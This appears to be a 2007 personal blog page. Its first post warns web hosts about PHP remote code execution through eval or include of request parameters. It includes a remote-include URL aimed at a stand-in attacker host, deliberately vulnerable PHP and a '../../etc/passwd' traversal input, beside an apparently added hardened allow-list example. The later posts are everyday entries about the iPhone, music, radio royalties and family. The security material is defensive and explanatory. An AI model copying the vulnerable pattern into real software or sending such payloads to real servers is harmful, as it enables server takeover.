Bad Code == Bad Day
June 30th, 2007
I’m becoming more and more convinced that I should REFUSE to host people who either upload other people’s code without knowing how it works, OR write poor code themselves.
Why is this?
Simple… In the last year, I’ve had two people who have uploaded code that they did not write that contained a query string that looked like this:
index.html?abs_path=http://www.jrcorps.com/
Now, that alone wouldn’t be so bad, if they didn’t have a line of code that looked like this:
eval($_GET['abs_path']);
or
include $_GET['abs_path'];
This is almost as bad:
include "/home/". $_GET['abs_path'];
In any case, what am I trying to say… All of these commands allow for Remote Code Execution. All of them can set me up for a very, very bad day. Here’s what happens:
- User uploads bad code
- Enemy writes a file browser/remote system php script.
- Enemy finds User’s bad code.
- Enemy sends a line like this: ?abs_path=http://badguyssite.com/asdf.txt
- User’s code runs Enemy’s code on User’s server
- Enemy has as much control over the server as the web server does.
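As an added example (not the post’s own code), here is the include pattern described above beside a hardened version that maps a request token to a fixed allow-list of files; the `page` parameter name, the `/home/site/pages/` directory and the page names are assumptions.

```php
<?php
// Added example, not the original post's code. A constructed "page" parameter
// stands in for the "abs_path" parameter discussed in the post.

// VULNERABLE: the request decides which file is included. With allow_url_fopen /
// allow_url_include enabled, "?page=http://attacker.example/x.txt" fetches and
// runs remote code; even with them disabled, "../" lets the caller walk the disk.
function include_page_unsafe(array $get): void
{
    include "/home/site/pages/" . $get['page'];
}

// HARDENED: request data never names a file. A short token is looked up in a
// fixed allow-list; anything not on the list is refused.
const PAGE_MAP = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page(array $get, string $baseDir): ?string
{
    $token = $get['page'] ?? 'home';
    if (!isset(PAGE_MAP[$token])) {
        return null;                       // unknown token: include nothing
    }
    // Defence in depth: the resolved file must still live under $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . PAGE_MAP[$token]);
    if ($base === false || $path === false || strpos($path, $base . '/') !== 0) {
        return null;
    }
    return $path;
}

function include_page_safe(array $get, string $baseDir): void
{
    $path = resolve_page($get, $baseDir);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

// Constructed requests: a normal one, the remote include from the post, and a
// directory traversal attempt. Only the first can ever resolve to a file.
foreach (['home', 'http://badguyssite.com/asdf.txt', '../../etc/passwd'] as $p) {
    var_dump(resolve_page(['page' => $p], __DIR__ . '/pages'));
}
```

Disabling allow_url_include (and allow_url_fopen where the site does not need it) in php.ini is the server-side complement to this fix; it stops the remote half of the attack even when hosted code is careless.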
Now some of you are saying, “Well, my webserver runs as nobody and all my permissions are set up right… What can anyone do to hurt me as user nobody?”
The short answer: probably nothing. The long answer is, if you’re using PHP, then you probably have a tmp folder… If you have a tmp folder, the enemy can then upload code to your server.
But Justin… they still can only run it as nobody…
Yes, but nobody has the power to do some things… For example, serve up massive amounts of data, run infinite “for” loops, or simply find a way to install a “root kit”. In any case, they can do things to make your server unusable… They might not be able to compromise data… but unusable is just as bad in some cases.
If your machine is ever compromised this way, I strongly recommend finding the hole as fast as possible and removing it from your system. Once you do, I strongly recommend you remove any code that they might have uploaded to your box. Lastly, I strongly recommend that you run a few scans on your box, including but not limited to:
- A Nessus Scan
- A RkHunter Scan
- A Virus Scan
- A Process Scan
- A Port Scan
I’ve included links to some of these on the left side.
Count down to some sort of vacation: 2 days
iPhone Madness
June 29th, 2007
Continuing with my mini theme of technology and music, I couldn’t help but mention that the iPhone, I guess, comes out today. I personally won’t be getting one anytime soon… and if I do, it will be because Apple has decided to make it available to providers other than AT&T or because someone has figured out the unlock code for the silly device. Even then, I will probably wait for the price to come down a bit.
For those of you who are now one of the lucky iPhone owners… Or heck, even those of you who have an iPod… If you are not taking advantage of the free song of the week over at iTunes… Shame on you. Every week, Apple gives away a song in hopes that you will buy more. It’s great for Apple. It’s great for the artists. And it’s great for people like me, who want more legal music, but don’t want to pay for it.
In any case, I’ve included a nice little banner ad to the left… Hopefully someone will get some free enjoyment out of the deal. Oh, and if you haven’t started downloading music LEGALLY yet… I STRONGLY advise that you do, and that you use iTunes! (Man I love podcasts)
The Sound of Work
June 28th, 2007
I think I’ve mentioned in the past that I work better with music. Steady rhythms allow my fingers and my mind to stay focused, and at a steady pace. Most of the time, I listen to some sort of trance/techno/europop/remixed pop stuff. The two big keys for me though are this:
1) Above all, it has to move. Slow, put-me-to-sleep music just doesn’t cut it when I’m programming, or trying to do anything for that matter… except maybe sleep.
2) If at all possible, it must have lyrics I can sing with (and preferably, know). Some of you might be surprised at how often I randomly shout lyrics to the song I’m listening to… Then again, some of you wouldn’t be surprised at all.
All that said, I’ve decided I want to share some of the “Remixed” music that I’ve been listening to lately. I know that it’s something that John and Alex do quite often, and I don’t plan on making an extreme habit of this… But who knows, maybe you’ll find something to put on that
If you want us to play legal…
June 26th, 2007
So while the big news of the day will undoubtedly be Paris Hilton being released from jail… the thing I am more concerned about at the moment is a royalty increase that is set to go into effect starting July 15th.
The royalty hike, as I understand it, is basically a huge increase in fees for those who host online radio stations. From what I read though, the biggest problem with the increase is a new “per station” fee.
Again, as I understand it, this would mean any website that allows custom playlists would be subject to a fee for each “custom” playlist created. It could easily mean the end of sites like Live365 and Yahoo Music. That would in turn mean the end of WTMK (one of my favorite video game music stations).
I suppose the smart thing would be for me to tell you to contact your senator and relay the message that they need to get on these judges to override the rate hike. Otherwise, we’ll all be missing some of our favorite online radio stations…
Want to read about it yourself? here
The Goal
June 25th, 2007
For a long time, I’ve had this idea that if you work hard enough, you can eventually get paid to sleep. For a while, I thought I was getting close, but as I come to find out, you’re more likely to get paid NOT to sleep than to get paid to sleep.
That said, this weekend has reminded me that there are some things in life other than computers (and planning a wedding). A portion of my Nebraska family came and stayed with us for the weekend. They arrived Saturday, and immediately took off for the Mall of America. Being the geek I am, I stayed back, worked for a little bit, then headed to a grad party (congratulations Adam). From there it was out to the MOA, where I spent the rest of my evening…
Sunday, we went to a morning boat cruise brunch (Afton House Inn, worth the money). From there we went to Treasure Island resort and casino, where I was too chicken to play poker in the poker room.
By the time I got home Sunday night, I just crashed into my bed. Work was the farthest thing from my mind for the first time in 3 months. Sure enough, I had a half dozen emails sitting on my desktop when I woke this morning… but knowing that they all survived until Monday makes me realize that I don’t have to spend every minute of my life programming.
And neither should you.
I’ve been Joe’d!
June 19th, 2007
Ok, so going along with my last post about the Benjamins… I’m kind of curious what people would think of if someone yelled “I’ve been Joe’d”. I can think of two things right off the bat:
1: Someone poured a cup of coffee over you and now you have to change your pants so as not to look like you have bladder control issues.
2: Your blog has been down for the last 16 hours because someone named Joe deleted your entry in the MySQL privilege table and didn’t realize it.
In case you’re curious, that’s why there was a pretty little message on the front page of my blog for the last 16 hours…